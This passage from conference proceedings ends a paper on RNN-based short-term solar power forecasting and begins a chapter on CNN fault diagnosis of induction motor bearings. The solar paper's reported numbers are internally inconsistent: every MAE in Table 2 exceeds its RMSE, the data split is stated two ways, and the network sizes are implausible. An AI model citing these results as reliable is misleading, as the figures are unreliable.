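def rnn_step(h_prev, x, w_hh, w_xh, b_h):
    """Eq. 1 with f assumed to be tanh: h(t) = tanh(w_hh*h(t-1) + w_xh*x(t) + b_h)."""
    return math.tanh(w_hh * h_prev + w_xh * x + b_h)

def rnn_forward(xs, w_hh=0.5, w_xh=1.0, b_h=0.0, w_hy=2.0, b_y=0.1, h0=0.0):
    """Run the recurrence over a sequence and emit y(t) = w_hy*h(t) + b_y (Eq. 2)."""
    h = h0
    outputs = []
    for x in xs:
        h = rnn_step(h, x, w_hh, w_xh, b_h)   # hidden state carries the past forward
        outputs.append(w_hy * h + b_y)
    return outputs

# The first and third inputs are both 0, yet the outputs differ,
# because the hidden state still remembers the pulse at step two.
outputs = rnn_forward([0.0, 1.0, 0.0])
```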
For deep analysis in the hidden states, Fig. 2 demonstrates how the hidden layer is connected to the previous layer [21]. While Fig. 3 shows the n-number of inputs and outputs.
Fig. 2. One fully connected layer.
Long short-term memory (LSTM), on the other hand, has also been used in many prediction and forecasting applications. Prior research has observed that LSTM works more effectively than a plain RNN. In this research, however, LSTM did not deliver the same precision as the RNN.
Fig. 3. Many to many type of RNN.
LSTM is a type of RNN with a few distinct features. It is used in speech recognition, image processing, and classification. Most of the time, LSTMs are used in sentiment analysis, video analysis, and language modelling. In comparison to a plain RNN, the LSTM architecture contains a set of gates, as shown in Fig. 4. The mathematical expressions are given in Eqs. 3, 4, and 5.
Fig. 4. Architecture of LSTM.
$$i_t = \sigma(w_i [h_{t-1}, x_t] + b_i) \qquad (3)$$
$$f_t = \sigma(w_f [h_{t-1}, x_t] + b_f) \qquad (4)$$
$$o_t = \sigma(w_o [h_{t-1}, x_t] + b_o) \qquad (5)$$
where i_t represents the input gate, f_t the forget gate, and o_t the output gate; σ is the sigmoid function, h_{t−1} is the previous hidden state, x_t is the current input, w denotes the weights, and b the biases of each gate. The major difference between RNN and LSTM is the memory feature: LSTM can learn long-term dependencies. Although LSTMs are mainly used for speech and video analysis, as discussed above, they did not perform well here. Owing to the data type, the LSTM produced its output in matrix form with negative values. Negative values are not meaningful for this prediction task and make the accuracy hard to analyze.
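The three gates of Eqs. 3 to 5 can be sketched for scalar h and x as below. Only the gates are shown, since the text does not give the cell-state update. The weight pairs and biases are hypothetical, and each pair (w_h, w_x) plays the role of w applied to the concatenation of the previous hidden state and the current input.

```python
import math

def sigmoid(z):
    """Logistic function; squashes any real number into (0, 1)."""
    return 1.0 / (1.0 + math.exp(-z))

def gate(weights, h_prev, x, bias):
    """sigma(w . [h_prev, x] + b) for scalar h_prev and x, with weights = (w_h, w_x)."""
    w_h, w_x = weights
    return sigmoid(w_h * h_prev + w_x * x + bias)

def lstm_gates(h_prev, x, params):
    """Evaluate the input, forget, and output gates for one time step."""
    return {name: gate(w, h_prev, x, b) for name, (w, b) in params.items()}

# Hypothetical parameters: ((w_h, w_x), bias) per gate.
params = {
    "input": ((0.5, 1.0), 0.0),
    "forget": ((0.3, -0.8), 1.0),
    "output": ((-0.2, 0.6), 0.0),
}
gates = lstm_gates(h_prev=0.0, x=0.0, params=params)
```

Because every gate passes through the sigmoid, its value lies strictly between 0 and 1 and acts as a soft switch on the information flowing through the cell.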
4 Proposed Methodology
Because of the high intermittency and variability of weather conditions, an RNN is chosen as the predictive tool for this study. The methodology of this research is divided into a few steps, as shown in Fig. 5. First, the input parameters are selected from the data set. Solar irradiance, module temperature, and solar power are taken as inputs, as shown in Fig. 5. The RNN model processes the input over multiple steps, and the input to the hidden layer at the current step also includes the hidden-layer state of the previous step, as in Eqs. 1 and 2. The next step is to pre-process the data with in-depth analysis. The data are filtered according to the high solar energy produced during the daytime. The strongest penetration of sun rays occurs mostly between 8:30 AM and 5:30 PM. Furthermore, the most important factor is solar irradiance [22]. Information about solar irradiance is essential for predicting future PV power generation. In most past research, only solar irradiance values above 300 W/m² are taken from the data set. Once the data have been pre-processed, establishing the model is the key step. The RNN model was designed by trial and error. The number of hidden layers in a neural network is always decided by trial and error. The data set was trained with 10 to 50 layers, and the results were then analyzed to see how many layers give accurate results. In this study, 30 hidden layers are chosen between the input and the output layers.
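The daytime and irradiance filtering described above can be sketched as follows. The field names and sample records are hypothetical, and applying the 300 W/m² threshold is an assumption: the text attributes that threshold to past research and does not state the exact rule used here.

```python
from datetime import datetime, time

DAY_START = time(8, 30)    # 8:30 AM
DAY_END = time(17, 30)     # 5:30 PM
MIN_IRRADIANCE = 300.0     # W/m^2, threshold quoted from past research

def keep_sample(sample):
    """Keep readings taken in the daytime window with sufficient irradiance."""
    in_window = DAY_START <= sample["timestamp"].time() <= DAY_END
    return in_window and sample["irradiance"] > MIN_IRRADIANCE

# Hypothetical per-minute records (irradiance in W/m^2, power in MW).
samples = [
    {"timestamp": datetime(2019, 7, 1, 7, 0), "irradiance": 120.0, "power": 5.0},
    {"timestamp": datetime(2019, 7, 1, 12, 0), "irradiance": 850.0, "power": 48.0},
    {"timestamp": datetime(2019, 7, 1, 16, 0), "irradiance": 250.0, "power": 12.0},
    {"timestamp": datetime(2019, 7, 1, 19, 0), "irradiance": 0.0, "power": 0.0},
]
filtered = [s for s in samples if keep_sample(s)]
```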
Fig. 5. Flow chart of the proposed methodology.
For a brief analysis of the data, the trend among the input parameters before training was observed, as shown in Fig. 6. The trend shows that solar power and irradiance are almost directly proportional to each other, whereas module temperature remains nearly constant throughout the day. The readings cover the entire month of July 2019.
Fig. 6. Trend between input parameters.
The trends between the target and all input features were also examined, since the training target is essential, as shown in Fig. 7. Supervised machine learning approaches need a target to start the simulation. The target serves as the reference between the input and the output layer. Employing a target is an essential part of any supervised machine learning model, as it supplies the data against which the prediction is calculated. In short, it brings accuracy to the results. Figure 8 shows the trend of each input parameter individually.
Fig. 7. Trend of input parameters with the target.
The data set is divided in a 70% to 30% ratio: 70% of the data is allocated to training, while 15% goes to validation and the remaining 15% to testing, as shown in Fig. 8. The network topology of the RNN model is given in Table 1.
Table 1. Network topologies used in RNN
Arguments | Values
Layerdelays | 1:5
Hiddenlayers | 30
Trainfunction | Trainlm
No of hidden neurons | 12283
Batch size | 12283 × 3
Fig. 8. Division of data set.
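The 70/15/15 division can be sketched as below. The sketch assumes contiguous blocks in time order, which is a common choice for time series; the text does not say whether the division was contiguous or random, and the function name is hypothetical.

```python
def split_dataset(samples, train_pct=70, val_pct=15):
    """Split into training, validation, and test blocks by percentage."""
    n = len(samples)
    n_train = n * train_pct // 100      # integer arithmetic avoids float rounding
    n_val = n * val_pct // 100
    train = samples[:n_train]
    val = samples[n_train:n_train + n_val]
    test = samples[n_train + n_val:]    # whatever remains (about 15%)
    return train, val, test

# Hypothetical series of 100 time-ordered readings.
series = list(range(100))
train, val, test = split_dataset(series)
```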
After the RNN model has been trained successfully, its accuracy is calculated with quantitative measures. In this paper, RMSE (Root Mean Square Error), MAE (Mean Absolute Error), and MAPE (Mean Absolute Percentage Error) are chosen, as expressed in Eqs. 6, 7, and 8 [23].
$$\mathrm{RMSE} = \sqrt{\frac{\sum_{i=1}^{N} (y_i - \hat{y}_i)^2}{N}} \qquad (6)$$
$$\mathrm{MAE} = \frac{1}{N} \sum_{i=1}^{N} \left| y_i - \hat{y}_i \right| \qquad (7)$$
$$\mathrm{MAPE} = \frac{1}{N} \sum_{i=1}^{N} \left| \frac{y_i - \hat{y}_i}{y_i} \right| \times 100 \qquad (8)$$
where y_i is the actual data, ŷ_i is the predicted data, and N is the number of samples. Solar energy is inherently variable: there are no fixed conditions on the sun's intensity, and the weather is intermittent and can change at any time. The variation in solar power generation was also observed in this study to examine its behavior and trend over time. The maximum solar energy was observed between roughly 8:30 in the morning and 5:30 in the evening. The trend is shown in Fig. 11, which makes clear how quickly solar power rises and falls with time and weather conditions. Each day shows different fluctuations and variations according to the solar irradiance. For comparison, LSTM was chosen as a comparative model against the RNN. The output showed that LSTM is not a suitable model for forecasting solar power on this array-type data set: it contained negative values, which are not meaningful for this forecasting purpose. The output obtained from the LSTM model is shown in Fig. 9.
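The three error measures of Eqs. 6, 7, and 8 can be sketched in a few lines. The sample values are hypothetical, and MAPE as written requires every actual value to be non-zero.

```python
import math

def rmse(actual, predicted):
    """Root mean square error (Eq. 6)."""
    return math.sqrt(sum((y - p) ** 2 for y, p in zip(actual, predicted)) / len(actual))

def mae(actual, predicted):
    """Mean absolute error (Eq. 7)."""
    return sum(abs(y - p) for y, p in zip(actual, predicted)) / len(actual)

def mape(actual, predicted):
    """Mean absolute percentage error (Eq. 8); actual values must be non-zero."""
    return 100.0 * sum(abs((y - p) / y) for y, p in zip(actual, predicted)) / len(actual)

# Hypothetical solar power readings and forecasts.
actual = [100.0, 200.0, 400.0]
predicted = [110.0, 190.0, 380.0]
scores = (rmse(actual, predicted), mae(actual, predicted), mape(actual, predicted))
```

Night-time readings with zero power would make MAPE undefined, which is one practical reason to restrict the data to the daytime window before scoring.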
Fig. 9. Solar power (MW) characteristic using LSTM.
The predicted solar power obtained from the LSTM behaves differently from that of the RNN model. The predicted output is generated in the form of a 3 × 3 matrix, which also includes negative values. A power prediction cannot be negative, so such output either carries no concrete information or implies that the model is dealing with outliers. Comparing the LSTM output therefore shows that the LSTM model is not suitable for the kind of data set used in this research. Because the data are real-time data with thousands of time steps at per-minute resolution, the output has been compressed into matrix form relative to the targeted output and shows no observations, as seen in Fig. 10, which shows the trend of the solar power characteristic over seven days. The output also reveals that solar power forecasting is somewhat challenging for LSTM, as this model is best known for image processing and for speech and video recognition.
Fig. 10. Trend of solar power among seven days.
5 Results and Discussion In this study, the results are quantified through RMSE (Root Mean Square Root) and MAE (Mean Absolute Error). Solar power, solar irradiance, and module temperature are
Short Term Solar Power Forecasting Using Deep Neural Networks
227
taken as input, while the target contains solar power so as to obtain the desired output. Owing to the size of the data set and training time constraints, the results are shown and discussed month by month. After extensive tuning and several rounds of trial and error, the output shows low errors. Figure 11 shows the output versus target trend for the RNN model. The trend is shown on the test indices, which are 15% of the whole data. The output follows the target closely, and the model is minimizing the error. Table 2 summarizes the error reduction for every month. As is evident from the quantifying measures, the RMSE decreases from 57.50 for the persistence model to 31.38 for the RNN during February. The percentage MAPE almost fulfills the criterion of good accuracy [24, 25], which states that MAPE should be around 10%. In this study, the reduction in percentage MAPE is shown in comparison with the persistence model. Furthermore, a significant reduction in the MAE is also observed. In short-term solar power prediction, the persistence model is the usual benchmark against which the predicted output is compared. The persistence model assumes that the conditions at the time of the forecast will not change. The comparison of predicted solar power is made at the zeroth hour, and the model predominantly uses the previous day's data as the forecast. The persistence model is expressed in Eq. 9.

$$\hat{y}(t + 1) = y(t - 1) \tag{9}$$

where $y(t - 1)$ is the value at the previous time step and $\hat{y}(t + 1)$ is the expected outcome.
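The persistence benchmark and the error measures used in this section can be illustrated with a minimal sketch. The function names, the `lag` parameter, and the sample readings are assumptions made for illustration; they are not taken from the study, whose implementation is not given.

```python
import math


def persistence_pairs(series, lag=1):
    """Pair each target value with the value observed `lag` steps earlier."""
    targets = series[lag:]
    forecast = series[:-lag]
    return targets, forecast


def rmse(targets, forecast):
    """Root mean square error."""
    return math.sqrt(sum((t - f) ** 2 for t, f in zip(targets, forecast)) / len(targets))


def mae(targets, forecast):
    """Mean absolute error."""
    return sum(abs(t - f) for t, f in zip(targets, forecast)) / len(targets)


def mape(targets, forecast):
    """Mean absolute percentage error in percent; targets must be non-zero."""
    return 100.0 * sum(abs((t - f) / t) for t, f in zip(targets, forecast)) / len(targets)


# Hypothetical power readings (not data from the study).
power = [100.0, 110.0, 120.0, 90.0, 100.0]
targets, forecast = persistence_pairs(power, lag=1)

print("RMSE:", rmse(targets, forecast))
print("MAE: ", mae(targets, forecast))
print("MAPE:", mape(targets, forecast))
```

Any forecasting model can be scored with the same three functions, which makes the comparison against the persistence baseline direct.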
Fig. 11. Solar power generation prediction characteristic.
Regression analysis is carried out to check how well the model fits the data set. It describes the relationship between the predictor and the response. In Fig. 12, the data points lie close to the fitted line, indicating a low training error. Furthermore, Fig. 13 shows the training performance at epoch 85, where the model reaches its minimum mean squared error (MSE). Figure 14 and Table 2 show the quantifying measures from August 2019 to March 2020. As stated in the aforementioned methods, solar energy is intermittent and variable, so the errors also vary from month to month. However, the error reduction between the response and the predictor is almost the same in every month. Therefore, in Fig. 15 the final RMSE, MAE and MAPE
Fig. 12. Regression analysis after successful training.
Fig. 13. Performance plot obtained after training.
are compared with the persistence model. The histogram clearly shows that the RNN model has performed well and reduced the errors compared to the persistence model. LSTM was also chosen for comparison with the results obtained from the RNN. However, the quantifying measures could not be computed for the LSTM model: because of the form of its output matrix, it is hard to calculate RMSE, MAE and MAPE. From these results, the RNN appears to be a promising model for predicting solar power generation. It works well for time series and continuous data and reduces the errors substantially. According to the percentage MAPE criterion, a forecast whose MAPE is greater than 10% and less than 20% falls under the category of good accuracy [26]. In this paper, the RNN shows good accuracy and fulfills the percentage MAPE criterion.
Fig. 14. Reduction of errors from Aug 2019 to Mar 2020.
Table 2. Quantifying measures, 2019–2020

Month   Error   Persistence   RNN
Aug     RMSE    46.50         30.19
Aug     MAE     55.75         37.40
Aug     MAPE    17.52         11.29
Sep     RMSE    40.52         31.54
Sep     MAE     48.44         39.22
Sep     MAPE    14.52         11.97
Oct     RMSE    47.04         31.47
Oct     MAE     54.97         39.18
Oct     MAPE    16.88         11.83
Nov     RMSE    49.05         30.8
Nov     MAE     60.52         38.2
Nov     MAPE    18.03         11.59
Dec     RMSE    47.4          31.39
Dec     MAE     56.70         39.5
Dec     MAPE    17.50         11.88
Jan     RMSE    30.14         29.87
Jan     MAE     68.75         39.6
Jan     MAPE    11.01         6.06
Feb     RMSE    57.50         31.38
Feb     MAE     73.00         38.6
Feb     MAPE    22.82         11.90
Mar     RMSE    53.93         30.19
Mar     MAE     67.79         37.40
Mar     MAPE    19.95         11.29
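As a quick arithmetic check, the monthly values in Table 2 can be averaged over the eight months to compare the two models. The sketch below only restates the table; the dictionary layout and the helper name `column_mean` are illustrative assumptions.

```python
from statistics import mean

# (RMSE, MAE, MAPE) per month, copied from Table 2.
persistence = {
    "Aug": (46.50, 55.75, 17.52), "Sep": (40.52, 48.44, 14.52),
    "Oct": (47.04, 54.97, 16.88), "Nov": (49.05, 60.52, 18.03),
    "Dec": (47.4, 56.70, 17.50), "Jan": (30.14, 68.75, 11.01),
    "Feb": (57.50, 73.00, 22.82), "Mar": (53.93, 67.79, 19.95),
}
rnn = {
    "Aug": (30.19, 37.40, 11.29), "Sep": (31.54, 39.22, 11.97),
    "Oct": (31.47, 39.18, 11.83), "Nov": (30.8, 38.2, 11.59),
    "Dec": (31.39, 39.5, 11.88), "Jan": (29.87, 39.6, 6.06),
    "Feb": (31.38, 38.6, 11.90), "Mar": (30.19, 37.40, 11.29),
}


def column_mean(table, index):
    """Average one error measure (0 = RMSE, 1 = MAE, 2 = MAPE) over all months."""
    return mean(row[index] for row in table.values())


rmse_persistence = column_mean(persistence, 0)
rmse_rnn = column_mean(rnn, 0)
mape_persistence = column_mean(persistence, 2)
mape_rnn = column_mean(rnn, 2)

print(f"Mean RMSE: {rmse_persistence:.2f} (persistence) vs {rmse_rnn:.2f} (RNN)")
print(f"Mean MAPE: {mape_persistence:.2f}% (persistence) vs {mape_rnn:.2f}% (RNN)")
```

The averages come out at roughly 46.5 versus 30.9 for RMSE and 17.3% versus 11.0% for MAPE.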
Fig. 15. Comparison of RNN with the persistence model.
6 Conclusion and Future Work
In this paper, an RNN trained with the Levenberg-Marquardt algorithm is used to predict solar power generation six hours ahead. Unlike traditional neural networks, the RNN copes well with the complexities of large data sets that contain errors and biases. It reduces the errors through back-propagation, and the simulations and verifications are made on a real-time data set. The proposed forecasting method has reduced the percentage MAPE from almost 18% to 11%, which falls under good accuracy, while the RMSE drops from 47 to 30 compared with the persistence model. This indicates that the RNN model is more accurate than the persistence model. Consequently, the proposed model provides well-founded forecasting for actual PV power grids. Additionally, the proposed methodology can support the future deployment of solar energy and can be used for broader time horizons. There is room for further improvement in future work, as machine learning approaches continue to advance and a large body of work already exists in the field of energy forecasting. Firstly, different training algorithms such as gradient descent, resilient propagation, and Bayesian regularization can be applied to the RNN to compare their performance. Secondly, more precise PV power output forecasts may be obtained by combining different machine learning approaches, such as SVM and regression techniques [27]. Lastly, the RNN model can be applied to other forecasting fields such as wind speed, energy management, trading, and load forecasting.
References
1. Hadi, R.S., Abdulateef, O.F.: Modeling and prediction of photovoltaic power output using artificial neural networks considering ambient conditions. Assoc. Arab Univ. J. Eng. Sci. 25(5), 623–638 (2018)
2. Ogundiran, P.: Renewable energy as alternative source of power and funding of renewable energy in Nigeria. Asian Bull. Energ. Econ. Technol. 4(1), 1–9 (2018)
3. Antonanzas, J., Osorio, N., Escobar, R., Urraca, R., Martinez-De-Pison, F., Antonanzas-Torres, F.: Review of photovoltaic power forecasting. Sol. Energy 136, 78–111 (2016)
4. Abuella, M.: Solar power forecasting using artificial neural networks. In: North American Power Symposium, IEEE, pp. 1–5 (2015)
5. Kaur, A.N.: Benefits of solar forecasting for energy imbalance markets. Renew. Energ. 86, 819–830 (2015)
6. Kikusato, H., Mori, K., Yoshizawa, S., Fujimoto, Y., Asano, H., et al.: Electric vehicle charge–discharge management for utilization of photovoltaic by coordination between home and grid energy management systems. IEEE Trans. Smart Grid 10(3), 3186–3197 (2018)
7. Ni, K., Wang, J., Tang, G., Wei, D.: Research and application of a novel hybrid model based on a deep neural network for electricity load forecasting: a case study in Australia. Energies 12(13), 2467 (2019)
8. Kumari, J.: Mathematical modeling and simulation of photovoltaic cell using matlab-simulink environment. Int. J. Electr. Comput. Eng. 2(1), 26 (2012)
9. Li, G., Wang, H., Zhang, S., Xin, J., Liu, H.: Recurrent neural networks based photovoltaic power forecasting approach. Energies 12(13), 2538 (2019)
10. Torres, J.F., Troncoso, A., Koprinska, I., Wang, Z., Martínez-Álvarez, F.: Big data solar power forecasting based on deep learning and multiple data sources. Expert. Syst. 36(4), e12394 (2019)
11. Cervone, G., Clemente-Harding, L., Alessandrini, S., Delle Monache, L.: Short-term photovoltaic power forecasting using artificial neural networks and an analog ensemble. Renew. Energ. 108, 274–286 (2017)
12. Shi, J., Lee, W., Liu, Y., Yang, Y., Wang, P.: Forecasting power output of photovoltaic (2015)
13. Abdel-Nasser, M., Mahmoud, K.: Accurate photovoltaic power forecasting models using deep LSTM-RNN. Neural Comput. 31, 1–14 (2017)
14. Pazikadin, A., Rifai, D., Ali, K., Malik, M., Abdalla, A., Faraj, M.: Solar irradiance measurement instrumentation and power solar generation forecasting based on artificial neural networks (ANN): a review of five years research trend. Sci. Total Environ. 715, 136848 (2020)
15. Mishra, S., Palanisamy, P.: Multi-time-horizon solar forecasting using recurrent neural network. In: 2018 IEEE Energy Conversion Congress and Exposition (ECCE), pp. 18–24. IEEE (2018)
16. Ye, Z., Kim, M.K.: Predicting electricity consumption in a building using an optimized backpropagation and Levenberg–Marquardt back-propagation neural network: case study of a shopping mall in China. Sustain. Cities Soc. 42, 176–183 (2018)
17. Panamtash, H., Zhou, Q., Hong, T., Qu, Z., Davis, K.: A copula-based Bayesian method for probabilistic solar power forecasting. Sol. Energ. 196, 336–345 (2020)
18. Zhang, R., Meng, F., Zhou, Y., Liu, B.: Relation classification via recurrent neural network with attention and tensor layers. Big Data Min. Analytics 1(3), 234–244 (2018)
19. Yu, Y., Si, X., Hu, C., Zhang, J.: A review of recurrent neural networks: LSTM cells and network architectures. Neural Comput. 31(7), 1235–1270 (2019)
20. Lee, D., Kim, K.: Recurrent neural network-based hourly prediction of photovoltaic power output using meteorological information. Energies 12(2), 215 (2019)
21. Salehinejad, H., Sankar, S., Barfett, J., Colak, E., Valaee, S.: Recent advances in recurrent neural networks. arXiv preprint arXiv:1801.01078 (2017)
22. Javed, A., Kasi, B.K., Khan, F.A.: Predicting solar irradiance using machine learning techniques. In: 2019 15th International Wireless Communications & Mobile Computing Conference (IWCMC), pp. 1458–1462 (2019)
23. Chicco, D., Warrens, M.J.: The coefficient of determination R-squared is more informative than SMAPE, MAE, MAPE, MSE and RMSE in regression analysis evaluation. PeerJ Comput. Sci. 7, e623 (2021)
24. Wang, L., Lv, S.X., Zeng, Y.R.: Effective sparse adaboost method with ESN and FOA for industrial electricity consumption forecasting in China. Energy 155, 1013–1031 (2018)
25. Babbar, S.M., Lau, C.Y., Thang, K.F.: Long term solar power generation prediction using adaboost as a hybrid of linear and non-linear machine learning model. Int. J. Adv. Comput. Sci. Appl. 12(11) (2021)
26. Ding, J., Tarokh, V., Yang, Y.: Model selection techniques: an overview. IEEE Sig. Process. Mag. 35(6), 16–34 (2018)
27. Babbar, S.M., Lau, C.Y.: Medium term wind speed forecasting using combination of linear and nonlinear models. Solid State Technol. 63(1s), 874–882 (2020)
Convolutional Neural Networks for Fault Diagnosis and Condition Monitoring of Induction Motors
Fatemeh Davoudi Kakhki1,2(B) and Armin Moghadam1
1 Department of Technology, San Jose State University, San Jose, CA 95192, USA
{fatemeh.davoudi,armin.moghadam}@sjsu.edu
2 Machine Learning and Safety Analytics Lab, Department of Technology, San Jose State University, San Jose, CA 95192, USA
Abstract. Intelligent fault diagnosis methods based on vibration signal analysis are widely used for bearing fault detection in the condition monitoring of induction motors. This approach has several challenges. First, a combination of various data preprocessing methods is required to prepare vibration time-series data as input for training machine learning models. In addition, there is no specific number of features or single methodology for data transformation that guarantees reliable fault diagnosis results. In this study, we use a benchmark dataset to train convolutional neural networks (CNN) on raw vibration signals and on feature-extracted data in two separate experiments. The empirical results show that the CNN model trained on raw data has superior performance, with an average accuracy of 98.64% and ROC and F1 scores of over 0.99. The results suggest that deep learning models such as CNN are a promising substitute for conventional signal processing and machine learning models for fault diagnosis and condition monitoring of induction motors.
Keywords: Bearing fault diagnosis · Convolutional neural networks · Condition monitoring
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 233–241, 2023. https://doi.org/10.1007/978-3-031-28073-3_16
1 Introduction
Bearing faults are the most common type of fault and the main source of machine failures in induction motors [1]. Unexpected machine failure may have disastrous consequences such as personnel casualties, financial loss and breakdown of the motor [2]. Therefore, condition monitoring and fault diagnosis of machinery are crucial to safe and reliable production in industrial systems [3]. Condition monitoring includes the processes and methods for observing the health of the system at fixed time intervals [3]. Condition monitoring of induction motors provides the opportunity to prevent or minimize unscheduled downtime and increase the efficiency of induction motors [3, 4]. There are many procedures for fault diagnosis of bearings in induction motors. One of the efficient approaches for detecting faults in bearings is the comparison between
normal and faulty vibration signals [5–7] obtained from the induction motor using vibration sensors such as accelerometers. These sensors can be located around the bearing in a designed testbed and show the condition of the bearing [8]. Since these signals contain a considerable amount of noise, they do not clearly distinguish faulty bearing conditions when analyzed in raw format. In addition, feature extraction from vibration signals is challenging for fault diagnosis purposes due to the non-stationary and non-linear nature of the signals [6]. The rest of the paper is organized as follows: Sect. 2 presents a brief discussion of previous related work on using machine learning and deep learning models for condition monitoring of induction motors. The data used in the study and the methodology are explained in Sects. 3 and 4, followed by the presentation and discussion of results in Sect. 5. A brief overview of the work and of the implementation of the results for condition monitoring, in Sect. 6, completes the paper.
2 Related Work
To address the challenges arising from the nature of vibration signals, various signal processing methods have been used in the literature to prepare vibration data for fault detection analysis. Many studies have focused on fault diagnosis in bearings using signal processing approaches [9, 10] and, more recently, machine learning (ML) methods [6, 11–15]. ML models are popular in prognostics and health management studies for structural health and condition monitoring [16]. The combination of signal processing and ML models has shown promise in providing high accuracy in the classification and prediction of faulty versus normal bearing conditions. A popular method for preparing data for modeling is to extract time domain statistical features from raw signals and feed them as input for training ML models [10, 17, 18]. The purpose of feature extraction is to reduce the high dimension of the data as well as to improve the accuracy and predictive power of the models [19]. The main challenge with this approach is that there is no single scientific rule for the exact number of features that should be drawn from signals to obtain the highest accuracy from ML models. Therefore, experimental studies with different feature extraction approaches, with various numbers and types of features, are conducted for fault diagnosis of bearings [5]. An alternative solution is to take advantage of modeling techniques that do not necessarily require feature extraction and whose performance is not significantly affected by the quantity and type of features extracted from vibration signals. Deep neural networks, or deep learning (DL) models, could be used as such an alternative for fault diagnosis and detection, addressing the challenges of data preparation, which is a required and influential step in training ML models. The reason is that DL algorithms are capable of automatically extracting the most important features from the original signals and simultaneously classifying the types of fault [20]. Furthermore, DL models perform well in extracting information from noisy data and avoid overfitting, as they are non-parametric statistical models [21]. The structure of a DL model typically includes an input layer, hidden layers, and an output layer. DL models are capable of detecting complex nonlinear relationships between the input and output data [22]. Among the various types of DL algorithms, convolutional
neural networks (CNN) seem promising for bearing fault detection when applied to raw signals or to transformed signal data [2, 23]. Compared to typical neural networks, large-scale network implementation with CNN is more efficient and less challenging. In addition, CNN models have a weight-sharing property that allows the network to be trained with a reduced number of parameters, which enhances the generalizability of the models and helps avoid overfitting [25]. A CNN structure has a convolutional layer, a pooling layer, and a fully connected layer. Feature extraction and classification occur simultaneously [8]. The purpose of this study is to evaluate the performance of CNN models in the accurate classification of bearing faults in induction motors. Using a benchmark dataset, we compare the performance of CNN in classifying types of bearing faults in two different experiments, one with the CNN trained on raw data and one with the CNN trained on specifically extracted feature data. The results contribute to the performance assessment of CNN models in each experiment and provide insights into the most efficient and cost-effective method of fault diagnosis for condition monitoring of induction motors.
3 Data Description
The majority of studies on condition monitoring of induction motors through bearing fault diagnosis evaluate their proposed solutions on publicly available benchmark datasets [24]. In this study, we used the publicly available dataset from Case Western Reserve University, known as the CWRU data, which has been used by researchers in the fault diagnosis area as a benchmark dataset. According to the available documentation on how the CWRU data was generated, the data was collected through two accelerometers that captured the vibration signals at both the drive end (DE) bearing and the fan end bearing. Each bearing consists of four main components, namely the inner race, outer race, rolling element and cage, in each of which a bearing fault might occur. The CWRU dataset includes single point faults that were generated, using electro-discharge machining, at diameters of 0.007, 0.014, and 0.021 inch in three parts: the bearing inner raceway (IR), the bearing outer raceway (OR), and the bearing ball (B). The dataset also includes data for bearings in normal condition. In this study, we used a subset of the data for the two modeling experiments: vibration signals at the DE bearing, collected at a motor load of one horsepower and a motor speed of 1772 rpm with a sampling frequency of 48 kHz.
4 Methodology
In order to evaluate the effect of data preprocessing on fault diagnosis in this research, the performance of the same model should be evaluated on raw data and on preprocessed data. Therefore, we propose two experiments. In the first experiment, data points from raw signals are used for developing the first CNN model. In the second, specific statistical features are extracted from each row of data and used as input variables for building the second CNN model.
4.1 Experiment One: Raw Signal Data
In this experiment, raw data is used for training the CNN model. The only preprocessing step is choosing sampling intervals that are representative of the behavior of the whole data. To reduce overlap between data sample intervals, we segmented the data to draw the training and testing samples. For the 48 kHz sampling frequency, we collected segments of length 1024. In this way, approximately 460 segments of length 1024 are generated for each class, with a total of 10 output classes for normal and faulty bearings. The fault classes are B/IR/OR0.007, B/IR/OR0.014, and B/IR/OR0.021 for faults of the given diameters in the ball, inner race, and outer race, respectively. For example, B0.007 represents data where the fault was located in the bearing ball with a diameter of 0.007 inch. All other classes can be interpreted in the same way, giving nine output classes for faulty bearings plus one class for normal bearings in good condition. The final prepared dataset has dimension (460*10, 1024) for the 10 labels. In the next step, the data is partitioned into 80% for training and 20% for testing. The CNN model is built on the training data, and its performance is evaluated on the test data. The details of the sequential CNN used in this experiment are given in Table 1, which lists the types of layers and the number of parameters for each layer. The CNN model is trained on this segmented raw data for 50 epochs with a batch size of 128.

Table 1. CNN structure for experiment on raw data

Layer              Output shape          Number of parameters*
Conv2d             (none, 24, 24, 32)    2624
Max_pooling2d      (none, 12, 12, 32)    0
Conv2d_1           (none, 4, 4, 32)      82976
Max_pooling2d_1    (none, 2, 2, 32)      0
flatten            (none, 128)           0
dense              (none, 64)            8256
Dense_1            (none, 96)            6240
Dense_2            (none, 10)            970

* Total parameters: 101,066; trainable parameters: 101,066; non-trainable parameters: 0
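The segmentation and the 80/20 partition described for experiment one can be sketched as follows. This is a minimal illustration under stated assumptions: the helper names are hypothetical, the signal is synthetic rather than CWRU data, and the reshaping of each 1024-point segment into a 32 × 32 grid is an inference from the two-dimensional layer shapes in Table 1, not something the text states.

```python
import math
import random


def segment_signal(signal, length=1024):
    """Split a 1-D signal into non-overlapping segments of `length` samples."""
    n_segments = len(signal) // length
    return [signal[i * length:(i + 1) * length] for i in range(n_segments)]


def to_square(segment, side=32):
    """Reshape a flat segment of side*side samples into a side x side grid."""
    if len(segment) != side * side:
        raise ValueError("segment length must equal side * side")
    return [segment[r * side:(r + 1) * side] for r in range(side)]


def split_indices(n_samples, test_fraction=0.2, seed=0):
    """Shuffle sample indices and return (train_indices, test_indices)."""
    indices = list(range(n_samples))
    random.Random(seed).shuffle(indices)
    n_test = round(n_samples * test_fraction)
    return indices[n_test:], indices[:n_test]


# Synthetic stand-in for one class of vibration data (not CWRU data).
signal = [math.sin(0.01 * i) for i in range(460 * 1024 + 100)]

segments = segment_signal(signal)      # leftover samples at the end are dropped
grid = to_square(segments[0])          # assumed 2-D input layout for the CNN
train_idx, test_idx = split_indices(len(segments))

print(len(segments), len(grid), len(grid[0]), len(train_idx), len(test_idx))
```

Non-overlapping windows keep training and test segments from sharing samples, which matches the stated aim of reducing overlap between sample intervals.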
4.2 Experiment Two: Statistical Features Data
In the second experiment, we extracted time domain statistical features from the segmented data. To reduce the number of input variables in the CNN model, we used time domain feature extraction instead of the whole set of data points. In this approach, a number of statistical features are extracted from each row of normal and faulty signals,
